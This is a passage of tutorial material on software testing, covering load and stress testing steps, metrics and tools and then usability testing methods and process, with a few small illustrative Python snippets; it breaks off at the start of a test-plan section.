2. Analyze the measured metrics to diagnose potential bottlenecks. Based on the analysis, if required, capture additional metrics in subsequent test cycles. For example, suppose that during the first iteration of load tests, the process shows a marked increase in memory consumption, indicating a possible memory leak. In the subsequent iterations, additional memory counters related to generations can be captured to study the memory allocation pattern for the application.
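A minimal sketch of the comparison in step 1: checking captured values against accepted levels and noting whether each metric is trending toward or away from its objective. The objectives and the results from two consecutive runs are invented for illustration:

# Hypothetical accepted levels and results from two consecutive test runs.
objectives = {"p95_response_s": 2.0, "throughput_rps": 100}
previous_run = {"p95_response_s": 2.6, "throughput_rps": 85}
current_run = {"p95_response_s": 2.2, "throughput_rps": 95}

for metric, accepted in objectives.items():
    prev, curr = previous_run[metric], current_run[metric]
    # For response times, lower is better; for throughput, higher is better.
    lower_is_better = metric.endswith("_s")
    meets = curr <= accepted if lower_is_better else curr >= accepted
    improving = curr < prev if lower_is_better else curr > prev
    trend = "toward" if improving else "away from"
    print(f"{metric}: {curr} ({'meets' if meets else 'misses'} target "
          f"{accepted}, trending {trend} the objective)")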

Load testing helps to identify the maximum operating capacity of the application and any bottlenecks that might be degrading performance.


Stress testing

What is Stress Testing?

Stress testing is a non-functional testing technique performed as part of performance testing. During stress testing, the system is monitored after being subjected to overload, to ensure that it can sustain the stress.

How the system recovers from such a phase (after stress) is critical, because overload conditions are likely to occur in a production environment.

Reasons for conducting Stress Testing:

• It allows the test team to monitor system performance during failures.
• To verify whether the system has saved the data before crashing.
• To verify whether the system prints meaningful error messages while crashing, or prints random exceptions.
• To verify that unexpected failures do not cause security issues.

Stress Testing - Scenarios:

• Monitor the system behavior when the maximum number of users are logged in at the same time.
• All users performing critical operations at the same time.
• All users accessing the same file at the same time.
• Hardware issues, such as the database server going down or some of the servers in a server farm crashing.

Stress testing is also extremely valuable for the following reasons:

• To check whether the system works under abnormal conditions.
• To verify that appropriate error messages are displayed when the system is under stress.
• System failure under extreme conditions could result in enormous revenue loss.
• It is better to be prepared for extreme conditions by executing stress testing.

Goals of stress testing:

The goal of stress testing is to analyze the behavior of the system after failure. For stress testing to be successful, the system should display appropriate error messages while it is under extreme conditions.


Stress testing sometimes uses massive data sets, which may be lost during the test. Testers must take care not to lose this security-related data while doing stress testing.

The main purpose of stress testing is to make sure that the system recovers after failure, which is called recoverability. Stress testing is especially valuable in situations such as the following:

• The software being tested is "mission critical", that is, failure of the software (such as a crash) would have disastrous consequences.

• The amount of time and resources dedicated to testing is usually not sufficient, with traditional testing methods, to test all of the situations in which the software will be used when it is released.

• Even with sufficient time and resources for writing tests, it may not be possible to determine beforehand all of the different ways in which the software will be used. This is particularly true for operating systems and middleware, which will eventually be used by software that doesn't even exist at the time of the testing.

• Customers may use the software on computers that have significantly fewer computational resources (such as memory or disk space) than the computers used for testing.

• Input data integrity cannot be guaranteed. Input data can take many forms: data files, streams, and memory buffers, as well as arguments and options given to a command-line executable or user inputs triggering actions in a GUI application. Fuzzing and monkey test methods can be used to find problems due to data corruption or incoherence.

• Concurrency is particularly difficult to test with traditional testing methods. Stress testing may be necessary to find race conditions and deadlocks.

• Software such as web servers that will be accessible over the Internet may be subject to denial of service attacks.

• Under normal conditions, certain types of bugs, such as memory leaks, can be fairly benign and difficult to detect over the short periods of time in which testing is performed. However, these bugs can still be potentially serious. In a sense, stress testing for a relatively short period of time can be seen as simulating normal operation for a longer period of time.

Stress Testing

• It is a type of non-functional testing.
• It involves testing beyond normal operational capacity, often to a breaking point, in order to observe the results.
• It is a form of software testing that is used to determine the stability of a given system.
• It puts greater emphasis on robustness, availability, and error handling under a heavy load, rather than on what would be considered correct behavior under normal circumstances.


• The goals of such tests may be to ensure the software does not crash in conditions of insufficient computational resources (such as memory or disk space).

Stress testing is a software testing activity that determines the robustness of software by testing beyond the limits of normal operation. Stress testing is particularly important for "mission critical" software, but is used for all types of software. Stress tests commonly put a greater emphasis on robustness, availability, and error handling under a heavy load, than on what would be considered correct behavior under normal circumstances.

An example of stress testing: a banking application can take a maximum load of 20,000 concurrent users. Increase the load to 21,000 and perform some transactions, such as deposits or withdrawals. As soon as the transactions are performed, the banking application server database will sync with the ATM database server. Check whether this sync happens successfully with a user load of 21,000. Then repeat the same test with 22,000 concurrent users, and so on.

Under stress testing, various activities that overload the existing resources with excess jobs are carried out in an attempt to break the system down. Negative testing, which includes removal of components from the system, is also done as part of stress testing. Also known as fatigue testing, this testing should capture the stability of the application by testing it beyond its bandwidth capacity.

The purpose behind stress testing is to ascertain how the system fails and to monitor how gracefully it recovers. The challenge is to set up a controlled environment before launching the test so that you can precisely and repeatedly capture the behavior of the system under the most unpredictable scenarios.

Stress Testing Goal:

The goal of stress testing is to analyze post-crash reports to define the behavior of the application after failure. The biggest issue is to ensure that the system does not compromise the security of sensitive data after the failure. In a successful stress test, the system will come back to normality, along with all of its components, even after the most terrible breakdown.

Types of Stress Testing:

The types of stress testing are explained as follows:


Distributed Stress Testing:

In distributed client-server systems, testing is done across all clients from the server. The role of the stress server is to distribute a set of stress tests to all stress clients and track the status of each client. After a client contacts the server, the server adds the client's name and starts sending data for testing.

Meanwhile, the client machines send a signal, or heartbeat, indicating that they are connected to the server. If the server does not receive any signal from a client machine, that machine needs to be investigated further for debugging. For example, the server might connect with two clients (Client 1 and Client 2) but be unable to send signals to or receive signals from Clients 3 and 4.

Overnight runs are the best option for running these stress testing scenarios. Large server farms need a more efficient method for determining which computers have had stress failures that need to be investigated.


Application Stress Testing:

This testing concentrates on finding defects related to data locking and blocking, network issues, and performance bottlenecks in an application.

Transactional Stress Testing:

This performs stress testing on one or more transactions between two or more applications. It is used for fine-tuning and optimizing the system.

Systemic Stress Testing:

This is integrated stress testing applied across multiple systems running on the same server. It is used to find defects in which one application's data blocks another application.

Exploratory Stress Testing:

This type of stress testing is used to test the system with unusual parameters or conditions that are unlikely to occur in a real scenario. It is used to find defects around unexpected scenarios such as:

1. A large number of users logging in at the same time
2. A virus scanner starting on all machines simultaneously
3. The database going offline while it is being accessed from a web site
4. A large volume of data being inserted into the database simultaneously

Tools recommended for Stress Testing:

Stress Tester

This tool provides extensive analysis of web application performance, presents results in graphical format, and is extremely easy to use. No high-level scripting is required, and it gives a good return on investment.

NeoLoad

This is a popular tool available in the market for testing web and mobile applications. It can simulate thousands of users in order to evaluate application performance under load and analyze response times. It also supports cloud-integrated performance, load, and stress testing. It is easy to use, cost-effective, and provides good scalability.


AppPerfect

AppPerfect is a tool used for integrated load, stress, and performance testing, covering response time, hit count ratio, resource utilization, scalability, and reliability. It is extremely easy to use with minimal programming knowledge and is cost-effective. It gives user-friendly reports with defined outputs such as CSV, XLS, HTML, and PDF.

Metrics for stress testing

Metrics help in evaluating a system's performance and are generally studied at the end of a stress test. Commonly used metrics are:

Measuring Scalability & Performance

• Pages per second: measures how many pages have been requested per second.
• Throughput: a basic metric; response data size per second.
• Rounds: the number of times test scenarios were planned versus the number of times the client executed them.

Application Response

• Hit time: average time to retrieve an image or a page.
• Time to first byte: time taken to return the first byte of data or information.
• Page time: time taken to retrieve all the information in a page.

Failures

• Failed connections: the number of failed connections refused by the client (weak signal).
• Failed rounds: the number of rounds that failed.
• Failed hits: the number of failed attempts made by the system (broken links or unseen images).

Stress testing's objective is to check the system under extreme conditions. It monitors system resources such as memory, processor, and network, and checks the ability of the system to recover back to normal status. It also checks whether the system displays appropriate error messages while under stress.
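A few of the metrics above can be computed directly from captured request records. The sketch below does so for throughput, average hit time, and failed hits; the record format and values are assumed for illustration:

# Hypothetical request records captured during a stress test:
# (seconds since test start, response bytes, duration in s, succeeded?)
records = [
    (0.1, 20480, 0.40, True),
    (0.5, 15360, 0.55, True),
    (1.2, 0,     2.10, False),   # failed hit (e.g., a broken link)
    (1.8, 30720, 0.60, True),
]

test_duration_s = 2.0  # assumed window covered by the records

throughput_bps = sum(size for _, size, _, ok in records if ok) / test_duration_s
hit_time_avg_s = sum(d for _, _, d, _ in records) / len(records)
failed_hits = sum(1 for *_, ok in records if not ok)

print(f"throughput: {throughput_bps:.0f} bytes/second")
print(f"average hit time: {hit_time_avg_s:.2f} s")
print(f"failed hits: {failed_hits}")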


Approach for Stress Testing

The following steps are involved in stress-testing a Web application:

1. Step 1 - Identify test objectives. Identify the objectives of stress testing in terms of the desired outcomes of the testing activity.

2. Step 2 - Identify key scenario(s). Identify the application scenario or cases that need to be stress-tested to identify potential problems.

3. Step 3 - Identify the workload. Identify the workload that you want to apply to the scenarios identified during the “Identify objectives” step. This is based on the workload and peak load capacity inputs.

4. Step 4 - Identify metrics. Identify the metrics that you want to collect about the application’s performance. Base these metrics on the potential problems identified for the scenarios you identified during the “Identify objectives” step.

5. Step 5 - Create test cases. Create the test cases in which you define steps for running a single test, as well as your expected results.

6. Step 6 - Simulate load. Use test tools to simulate the required load for each test case and capture the metric data results.

7. Step 7 - Analyze results. Analyze the metric data captured during the test.

These steps are graphically represented below; the following sections discuss each step in detail.


Figure 18.1 Stress Testing Steps

Step 1 - Identify Test Objectives

Asking yourself or others the following questions can help in identifying the desired outcomes of your stress testing:

1. Is the purpose of the test to identify the ways the system can possibly fail catastrophically in production?

2. Is it to provide information to the team in order to build defenses against catastrophic failures?

3. Is it to identify how the application behaves when system resources such as memory, disk space, network bandwidth, or processor cycles are depleted?

4. Is it to ensure that functionality does not break under stress? For example, there may be cases where operational performance metrics meet the objectives, but the functionality of the application is failing to meet them — orders are not inserted in the database, the application is not returning the complete product information in searches, form controls are not being populated properly, redirects to custom error pages are occurring during the stress testing, and so on.


Step 2 - Identify Key Scenario(s)

To get the most value out of a stress test, the test needs to focus on the behavior of the usage scenario or scenarios that matter most to the overall success of the application. To identify these scenarios, you generally start by defining a single scenario that you want to stress-test in order to identify a potential performance issue. Consider these guidelines when choosing appropriate scenarios:

• Select scenarios based on how critical they are to overall application performance.

• Try to test those operations that are most likely to affect performance. These might include operations that perform intensive locking and synchronization, long transactions, and disk-intensive input/output (I/O) operations.

• Base your scenario selection on the specific areas of your application identified as potential bottlenecks by load-testing data. Although you should have fine-tuned and removed the bottlenecks after load testing, you should still stress-test the system in these areas to verify how well your changes handle extreme stress levels.

Examples of scenarios that may need to be stress tested separately from other usage scenarios for a typical e-commerce application include the following:

• An order-processing scenario that updates the inventory for a particular product. This functionality has the potential to exhibit locking and synchronization problems.

• A scenario that pages through search results based on user queries. If a user specifies a particularly wide query, there could be a large impact on memory utilization. For example, memory utilization could be affected if a query returns an entire data table.

Step 3 - Identify the Workload

The load you apply to a particular scenario should stress the system sufficiently beyond threshold limits to enable you to observe the consequences of the stress condition. One method to determine the load at which an application begins to exhibit signs of stress is to incrementally increase the load and observe the application behavior under various load conditions. The key is to systematically test with various workloads until you create a significant failure. These variations may be accomplished by adding more users, reducing delay times, adding or reducing the number and type of user activities represented, or adjusting test data.

For example, a stress test could be designed to simulate every registered user of the application attempting to log on during one 30-second period. This would simulate a situation where the application suddenly became available again after a period of downtime and all users were anxiously refreshing their browsers, waiting for the application to come back online. Although this situation does not occur frequently in the real world, it does happen often enough for there to be real value in learning how the application will respond if it does.

Remember to represent the workload with accurate and realistic test data — type and volume, different user logins, product IDs, product categories, and so on — allowing you to simulate important failures such as deadlocks or resource consumption.

The following activities are generally useful in identifying appropriate workloads for stress testing:

• Identify the distribution of work. For each key scenario, identify the distribution of work to be simulated. The distribution is based on the number and type of users executing the scenario during the stress test.

• Estimate peak user loads. Identify the maximum expected number of users during peak load conditions for the application. Using the work distribution you identified for each scenario, calculate the percentage of user load per key scenario.

• Identify the anti-profile. As an alternative, you can start by applying an anti-profile to the normal workload. In an anti-profile, the workload distributions are inverted for the scenario under consideration. For example, if the normal load for the order-processing scenario is 10 percent of the total workload, the anti-profile would be 90 percent of the total workload. The remaining load can be distributed among the other scenarios. Using an anti-profile can serve as a valuable starting point for your stress tests because it ensures that the critical scenarios are subjected to loads beyond the normal load conditions.
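The anti-profile arithmetic is straightforward to script. In this minimal sketch, the normal distribution and scenario names are hypothetical; the share of the scenario under consideration is inverted, and the remaining load is spread across the other scenarios in proportion to their normal shares:

# Hypothetical normal workload distribution (percent per scenario).
normal = {"browse": 60, "search": 30, "order_processing": 10}
scenario_under_test = "order_processing"

# Invert the scenario's share (10% -> 90%), then distribute the
# remaining load among the other scenarios.
anti = {scenario_under_test: 100 - normal[scenario_under_test]}
remainder = 100 - anti[scenario_under_test]
other_total = sum(v for k, v in normal.items() if k != scenario_under_test)
for k, v in normal.items():
    if k != scenario_under_test:
        anti[k] = remainder * v / other_total

print(anti)  # approx. {'order_processing': 90, 'browse': 6.7, 'search': 3.3}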

Step 4 - Identify Metrics

When identified and captured correctly, metrics provide information about how well or poorly your application is performing as compared to your performance objectives. In addition, metrics can help you identify problem areas and bottlenecks within your application.

Using the desired performance characteristics identified during the “Identify objectives” step, identify metrics to be captured that focus on potential pitfalls for each scenario. The metrics can be related to both performance and throughput goals as well as providing information about potential problems; for example, custom performance counters that have been embedded in the application.

When identifying metrics, you will use either direct objectives or indicators that are directly or indirectly related to those objectives.


Step 5 - Create Test Cases

Identifying workload profiles and key scenarios generally does not provide all of the information necessary to implement and execute test cases. Additional inputs for completely designing a stress test include performance objectives, workload characteristics, test data, test environments, and identified metrics. Each test design should mention the expected results and/or the key data of interest to be collected, in such a way that each test case can be marked as a “pass,” “fail,” or “inconclusive” after execution.


The following is an example of a test case based on the order-placement scenario.

Test 1 – Place Order Scenario

• Workload: 1,000 simultaneous users.
• Think time: Use a random think time between 1 and 10 seconds in the test script after each operation.
• Test duration: Run the test for two days.

Expected results:

• Application hosting process should not recycle because of deadlock or memory consumption.

• Throughput should not fall below 35 requests per second.
• Response time should not be greater than 7 seconds for 95 percent of total transactions completed.
• “Server busy” errors should not be more than 10 percent of the total responses because of contention-related issues.
• Order transactions should not fail during test execution. Database entries should match the “Transactions succeeded” count.
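Expected results stated this way lend themselves to an automated pass/fail check once the run completes. A minimal sketch, with the captured values invented for illustration:

# Hypothetical values captured after the two-day run.
captured = {
    "throughput_rps": 38.2,
    "p95_response_s": 6.4,
    "server_busy_error_pct": 7.5,
    "failed_order_transactions": 0,
    "process_recycled": False,
}

checks = [
    ("throughput >= 35 requests/second", captured["throughput_rps"] >= 35),
    ("95th percentile response <= 7 s",  captured["p95_response_s"] <= 7),
    ("'server busy' errors <= 10%",      captured["server_busy_error_pct"] <= 10),
    ("no failed order transactions",     captured["failed_order_transactions"] == 0),
    ("hosting process did not recycle",  not captured["process_recycled"]),
]

for label, ok in checks:
    print(("PASS " if ok else "FAIL ") + label)
print("Test 1 verdict:", "pass" if all(ok for _, ok in checks) else "fail")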

Step 6 - Simulate Load

After you have completed the previous steps to an appropriate degree, you should be ready to simulate load by executing the stress test. Typically, test execution follows these steps:

1. Validate that the test environment matches the configuration that you were expecting and/or designed your test for.

2. Ensure that both the test and the test environment are correctly configured for metrics collection.

3. Before running the test, execute a quick “smoke test” to make sure that the test script and remote performance counters are working correctly.

4. Reset the system (unless your scenario is to do otherwise) and start a formal test execution.

Note: Make sure that the client (a.k.a. load generator) computers that you use to generate load are not overly stressed. Utilization of resources such as processor and memory should remain low enough to ensure that the load-generation environment is not itself a bottleneck.

Step 7 - Analyze Results

Analyze the captured data and compare the results against the metric’s accepted level. If the results indicate that your required performance levels have not been attained, analyze and fix the cause of the bottleneck. To address observed issues, you might need to do one or more of the following:

• Perform a design review.
• Perform a code review.
• Run stress tests in environments where it is possible to debug possible causes of failures during test execution.

In situations where performance issues are observed, but only under conditions that are deemed to be unlikely enough to warrant tuning at the current time, you may want to consider conducting additional tests to identify an early indicator for the issue in order to avoid unwanted surprises.

Usage Scenarios for Stress Testing

The following are examples of how stress testing is applied in practice:

• Application stress testing. This type of test typically focuses on more than one transaction on the system under stress, without the isolation of components. With application stress testing, you are likely to uncover defects related to data locking and blocking, network congestion, and performance bottlenecks on different components or methods across the entire application. Because the test scope is a single application, it is common to use this type of stress testing after a robust application load-testing effort, or as a last test phase for capacity planning. It is also common to find defects related to race conditions and general memory leaks from shared code or components.

• Transactional stress testing. Transactional stress tests aim at working at a transactional level with load volumes that go beyond those of the anticipated production operations. These tests are focused on validating behavior under stressful conditions, such as high load, with the same resource constraints as when testing the entire application. Because the test isolates an individual transaction, or group of transactions, it allows for a very specific understanding of throughput capacities and other characteristics for individual components without the added complication of inter-component interactions that occurs in testing at the application level. These tests are useful for tuning, optimizing, and finding error conditions at the specific component level.

• Systemic stress testing. In this type of test, stress or extreme load conditions are generated across multiple applications running on the same system, thereby pushing the boundaries of the applications’ expected capabilities to an extreme. The goal of systemic stress testing is to uncover defects in situations where different applications block one another and compete for system resources such as memory, processor cycles, disk space, and network bandwidth. This type of testing is also known as integration stress testing or consolidation stress testing. In large-scale systemic stress tests, you stress all of the applications together in the same consolidated environment. Some organizations choose to perform this type of testing in a larger test lab facility, sometimes with the hardware or software vendor’s assistance.

Exploratory Stress Testing

Exploratory stress testing is an approach to subjecting a system, application, or component to a set of unusual parameters or conditions that are unlikely to occur in the real world but are nevertheless possible. In general, exploratory testing can be viewed as an interactive process of simultaneous learning, test design, and test execution. Most often, exploratory stress tests are designed by modifying existing tests and/or working with application/system administrators to create unlikely but possible conditions in the system. This type of stress testing is seldom conducted in isolation because it is typically conducted to determine if more systematic stress testing is called for related to a particular failure mode. The following are some examples of exploratory stress tests to determine the answer to “How will the system respond if…?”

• All of the users logged on at the same time. • The load balancer suddenly failed. • All of the servers started their scheduled virus scan at the same time during a

period of peak load. • The database went offline during peak usage.

Load test vs. stress test

Stress testing tries to break the system under test by overwhelming its resources or by taking resources away from it (in which case it is sometimes called negative testing). The main purpose of this process is to make sure that the system fails and recovers gracefully—a quality known as recoverability.

Load testing implies a controlled environment moving from low loads to high. Stress testing focuses on more random events, chaos, and unpredictability. Using a web application as an example, here are ways stress might be introduced:

• double the baseline number for concurrent users/HTTP connections
• randomly shut down and restart ports on the network switches/routers that connect the servers (via SNMP commands, for example)
• take the database offline, then restart it
• rebuild a RAID array while the system is running
• run processes that consume resources (CPU, memory, disk, network) on the Web and database servers (a minimal sketch follows this list)
• observe how the system reacts to failure and recovers:

o Does it save its state?
o Does the application hang and freeze, or does it fail gracefully?
o On restart, is it able to recover from the last good state?


o Does the system output meaningful error messages to the user and to the logs?

o Is the security of the system compromised because of unexpected failures?
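As a sketch of the "run processes that consume resources" idea flagged in the list above, the snippet below crudely burns CPU and holds memory on whatever host it runs on. The duration and allocation size are arbitrary assumptions; a real exercise would use dedicated tools and be coordinated with the observers:

import time

def consume_resources(seconds=10, mem_mb=100):
    """Crudely stress one host: hold roughly mem_mb of memory and spin
    the CPU for the given number of seconds (illustrative values)."""
    hog = bytearray(mem_mb * 1024 * 1024)  # hold memory for the duration
    deadline = time.time() + seconds
    x = 0
    while time.time() < deadline:  # busy-loop to consume CPU
        x = (x * 31 + 7) % 1000003
    return len(hog)

# Run on the Web or database server while the load test executes,
# then observe how the system reacts to the shortage and recovers.
consume_resources(seconds=5, mem_mb=50)
print("resource spike complete")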


Usability testing

DEFINITION

Usability Testing is a type of testing done from an end-user’s perspective to determine if the system is easily usable.

ISTQB’s Definition

usability testing: Testing to determine the extent to which the software product is understood, easy to learn, easy to operate and attractive to the users under specified conditions.

CSTE CBOK Definition

Usability Test: The purpose of this event is to review the application user interface and other human factors of the application with the people who will be using the application. This is to ensure that the design (layout and sequence, etc.) enables the business functions to be executed as easily and intuitively as possible.

Usability testing is a technique used in user-centered interaction design to evaluate a product by testing it on users. This can be seen as an irreplaceable usability practice, since it gives direct input on how real users use the system.[1] This is in contrast with usability inspection methods, where experts use different methods to evaluate a user interface without involving users.

The primary focus is on:

1. Ease of use
2. Ease of learning or familiarizing with the system
3. Satisfaction of the user with the entire experience

Usability testing focuses on measuring a human-made product's capacity to meet its intended purpose. Examples of products that commonly benefit from usability testing are foods, consumer products, web sites or web applications, computer interfaces, documents, and devices. Usability testing measures the usability, or ease of use, of a specific object or set of objects, whereas general human-computer interaction studies attempt to formulate universal principles.

• In usability testing, the testers basically test the ease with which the user interfaces can be used. It tests whether the application or the product built is user-friendly or not.

• Usability Testing is a black box testing technique.
• Usability testing also reveals whether users feel comfortable with your application or Web site according to different parameters - the flow, navigation and layout, speed and content - especially in comparison to prior or similar applications.

• Usability Testing tests the following features of the software.

– How easy it is to use the software.
– How easy it is to learn the software.
– How convenient the software is to the end user.

Usability testing includes the following five components:

1. Learnability: How easy is it for users to accomplish basic tasks the first time they encounter the design?

2. Efficiency: Once users have learned the design, how quickly can they perform tasks?

3. Memorability: When users return to the design after a period of not using it, how easily can they reestablish proficiency, or do they have to start over learning everything?

4. Errors: How many errors do users make, how severe are these errors, and how easily can they recover from the errors?

5. Satisfaction: How pleasant is it to use the design, and how much does the user like using the system?

Benefits of Usability Testing

Usability testing lets the design and development teams identify problems before they are coded. The earlier issues are identified and fixed, the less expensive the fixes will be in terms of both staff time and possible impact to the schedule. During a usability test, you will:

• Learn if participants are able to complete specified tasks successfully
• Identify how long it takes to complete specified tasks
• Find out how satisfied participants are with your Web site or other product
• Identify changes required to improve user performance and satisfaction
• Analyze the performance to see if it meets your usability objectives

Benefits of usability testing to the end user or the customer:

– Better quality software
– Software is easier to use
– Software is more readily accepted by users
– Shortens the learning curve for new users

What is Usability Testing?

Usability testing is a non-functional testing technique that measures how easily the system can be used by end users. Usability is difficult to evaluate and measure, but it can be assessed based on the parameters below:

• Level of skill required to learn/use the software. It should maintain a balance for both novice and expert users.
• Time required to get used to the software.
• The measure of increase in user productivity, if any.
• Assessment of a user's attitude towards using the software.

Usability Testing Process:

Usability testing is a very wide area of testing, and it needs a fairly high level of understanding of this field along with a creative mind. People involved in usability testing are required to possess skills like patience, the ability to listen to suggestions, openness to welcome any idea, and, most important of all, good observation skills to spot and fix the issues or problems.

Usability Testing

Usability testing refers to evaluating a product or service by testing it with representative users. Typically, during a test, participants will try to complete typical tasks while observers watch, listen, and take notes. The goal is to identify any usability problems, collect qualitative and quantitative data, and determine the participants' satisfaction with the product.

To run an effective usability test, you need to develop a solid test plan, recruit participants, and then analyze and report your findings.

Consider these elements when budgeting for usability testing:

• Time: You will need time to plan the usability test. It will take the usability specialist and the team time to become familiar with the site and pilot test the test scenarios. Be sure to budget in time for this test prep as well as running tests, analyzing the data, writing the report, and presenting the findings.

• Recruiting Costs: Consider how or where you will recruit your participants. You will either need to allow for staff time to recruit or engage a recruiting firm to schedule participants for you based on the requirements.

• Participant Compensation: If you will be compensating participants for their time or travel, factor that into your testing budget.

• Rental Costs: If you do not have monitoring or recording equipment, you will need to budget for rental costs for the lab or other equipment. You may also need to secure a location for testing, a conference room for example, so consider this as well.

It’s important to keep in mind that usability testing is not just a milestone to be checked off on the project schedule. The team should have a goal for why they are testing and then implement the results.

Why is usability testing performed?

Web and mobile applications rule the business world in recent times. For these apps to be embraced by customers, it is critical that they be efficient, effective, easy, simple, appealing, and engaging. Usability testing is all about determining whether a site is something the user would want to use and come back to, or not.

This not only applies to software systems. Any machine/interface that has a human interaction has got to satisfy these rules. How, you ask? Democracy would suffer if the voting machines were not usable. I wouldn’t vote if I had to click more than one button to choose my candidate, would you? Exactly!


For a more software-specific example, check out the "$300 Million Button" article by Jared Spool, which clearly explains how the placement of a single button impacted a business.

When is Usability Testing conducted?

As testers we know that the earlier a defect is found in the SDLC the cheaper it is to fix it. The same concept holds true for Usability Testing also.

Usability testing results affect the design of the product. So, ideally, usability testing should start at the design level. But that is not all; software undergoes many changes/interpretations/implementations throughout the SDLC process. To make sure that usability-related mistakes are not made at any of these steps, usability testing should be conducted often and continuously for maximum results.

Who performs usability testing?

It can be done as an internal process, where the designers, developers, and anyone else involved sit down, analyze their system, and produce the results. Based on these results, the design and/or code can be modified to be in accordance with the changes they all agree on.

A more advanced approach is to hire real-time users and give them particular tasks. One or more facilitators can devise these tasks and collect the results from the users.

The users can then provide information on whether:

1. the task was successful or not
2. the task could be performed easily
3. the experience was interesting, engaging, or annoying - their feelings towards the software

Key Benefits of Usability Testing:

• Decreases development and redesign costs, which increases user satisfaction.
• Helps determine the real requirements and tasks of the user early in the design process.
• Analysis of your website design's strengths and weaknesses.
• Limits graphics to those that serve the functions of the design.
• User productivity increases and cost decreases.
• Increases business due to satisfied customers.
• Reduces user acclimation time and errors.
• Provides better quality software to the end user or the customer.
• Software is easier to understand and use by the end user or the customer.
• Software is more gladly accepted by users.
• Shortens the learning curve for new users.


Advantages of Usability Testing:

• Usability testing finds important bugs and potholes in the tested application that are not visible to the developer and may even escape other types of testing.
• If proper resources (experienced and creative testers) are used, usability testing can help fix the problems users would face before the application is released, resulting in better performance and a more standard system.
• Usability tests can be modified according to requirements to support other types of testing, such as functional testing, system integration testing, unit testing, and smoke testing.
• Usability testing can be very economical if planned properly, yet highly effective and beneficial.
• Issues and potential problems are highlighted before the product is launched.
• It helps improve end-user satisfaction.
• It makes your system highly effective and efficient.
• It helps gather true feedback from your target audience, who actually use your system during the usability test, so you do not need to rely on "opinions" from random people.

Limitations of usability testing:

• The planning and data-collecting processes are time-consuming.
• It can be unclear why particular usability problems arise.
• The small and simple sample size makes it unreliable for drawing conclusions about subjective user preferences.
• It is hard to create a suitable context.
• You cannot test long-term experiences.
• Unplanned social interactions cannot be replicated.
• People act differently when they know they are being observed.

Cost is a major consideration in usability testing. It takes a lot of resources to set up a usability test lab, and recruiting and managing usability testers can also be expensive.


Goals of Usability Testing

The goal of this testing is to satisfy users, and it mainly concentrates on the following parameters of a system:

Effectiveness of the system

• Is the system easy to learn?
• Is the system useful? Does it add value to the target audience?
• Are the content, colors, icons, and images used aesthetically pleasing?

Efficiency

• Little navigation should be required to reach the desired screen or webpage, and scroll bars shouldn't be used frequently.
• Uniformity in the format of screens/pages in your application/website.
• Provision to search within your software application or website.

Accuracy

• No outdated or incorrect data, such as contact information or addresses, should be present.
• No broken links should be present.

User Friendliness

• Controls used should be self-explanatory and must not require training to operate.
• Help should be provided for the users to understand the application/website.
• Alignment with the above goals helps in effective usability testing.

Usability Testing Process

The usability testing process consists of the following phases:

Planning: During this phase, the goals of the usability test are determined. Having volunteers sit in front of your application and recording their actions is not a goal. You need to determine the critical functionalities and objectives of the system, and assign tasks to your testers that exercise these critical functionalities. During this phase, the usability testing method, the number and demographics of usability testers, and the test report formats are also determined.

Recruiting: During this phase, you recruit the desired number of testers as per your usability test plan. Finding testers who match your demographic (age, sex, etc.) and professional (education, job, etc.) profile can take time.

Usability Testing: During this phase, usability tests are actually executed.

Data Analysis: Data from usability tests is thoroughly analyzed to derive meaningful inferences and give actionable recommendations to improve overall usability of your product.

Reporting: The findings of the usability test are shared with all concerned stakeholders, which can include the designer, developer, client, and CEO.

Methods of Usability Testing

There are two methods available for usability testing:

1. Laboratory Usability Testing
2. Remote Usability Testing

Laboratory Usability Testing: This testing is conducted in a separate lab room in the presence of observers. The testers are assigned tasks to execute. The role of the observer is to monitor the behavior of the testers and report the outcome of testing. The observer remains silent during the course of testing. In this testing, both observers and testers are present in the same physical location.

Remote Usability Testing: In this testing, observers and testers are remotely located. Testers access the system under test remotely and perform the assigned tasks. The tester's voice, screen activity, and facial expressions are recorded by automated software. Observers analyze this data and report the findings of the test.

Categories of Usability Testing

There are 3 main categories of usability testing:

• Explorative: Used early in product development to assess the effectiveness and usability of a preliminary design or prototype, as well as users’ thought processes and conceptual understanding.

• Assessment: Used midway in product development or as an overall usability test for technology evaluation. Evaluates real-time trials of the technology to determine the satisfaction, effectiveness, and overall usability.


• Comparative: Compares two or more instructional technology products or designs and distinguishes the strengths and weaknesses of each.

Types of Usability Testing Methods

The following is a brief description of the main usability testing methods that are used.

Hallway Testing: Using random people to test the website rather than people who are trained and experienced in testing websites. This method is particularly effective for testing a new website for the first time during development.

Remote Usability Testing: Testing the usability of a website using people who are located in several countries and time zones. Sometimes remote testing is performed using video conferencing, while other times the user works separately from the evaluator. Nowadays, various software is available at relatively low cost that allows remote usability testing to be carried out even by observers who are not usability experts. Typically, the click locations and streams of the users are automatically recorded, and any critical incidents that occurred while they were using the site are also recorded, along with any feedback the user has submitted. Remote usability testing allows the length of time it took each tester to complete various tasks to be recorded. It is a good method of testing because the tests are carried out in the normal environment of the user instead of a controlled lab.

Expert Review: An expert in the field is asked to evaluate the usability of the website. Sometimes the expert is brought to a testing facility to test the site, while other times the tests are conducted remotely and automated results are sent back for review. Automated expert tests are typically not as detailed as other types of usability tests, but their advantage is that they can be completed quickly.

Paper Prototype Testing: Quite simply, this usability testing method involves creating rough, even hand-sketched, drawings of an interface to use as prototypes, or models, of a design. Observing a user undertaking a task using such prototypes enables the testing of design ideas at an extremely low cost and before any coding has been done.

Questionnaires and Interviews: Due to their one-on-one nature, interviews enable the observer to ask direct questions to the users (apart from double checking what they are really doing). Similarly, the observer can also ask questions by means of questionnaires. The advantage of questionnaires is that they allow more structured data collection. However, they are rigid in nature as opposed to interviews.


Usability testing questionnaires are usually handed out after the user has tried completing the given task.

Do-it-Yourself Walkthrough: Just as the name implies, in this technique, the observer sets up a usability test situation by creating realistic scenarios. He or she then walks through the work themselves just like a user would. A variation of this technique is the group walkthrough where the observer has multiple attendees performing the walkthrough.

Controlled Experiments: An approach that is similar to scientific experiments, typically involving a comparison of two products, with careful statistical balancing, in a laboratory. This may be the hardest method to apply “in the real world,” but due to its scientific nature it yields very accurate results that can eventually be published.


• Automated expert review – Similar to expert reviews, this procedure provides usability testing by using programs that apply good design rules and heuristics. Tests conducted this way are quicker and more consistent.

The classic process

The process that Jeff Rubin and I present in the Handbook of Usability Testing, Second Edition, could be used for a formal usability test, but it could also be used for less formal tests that can help you explore ideas and form concepts and designs. The steps are basically the same for either kind of test:

• Develop a test plan • Choose a testing environment • Find and select participants • Prepare test materials • Conduct the sessions • Debrief with participants and observers • Analyze data and observations • Create findings and recommendations

Let’s walk through each of these steps.

Develop a test plan

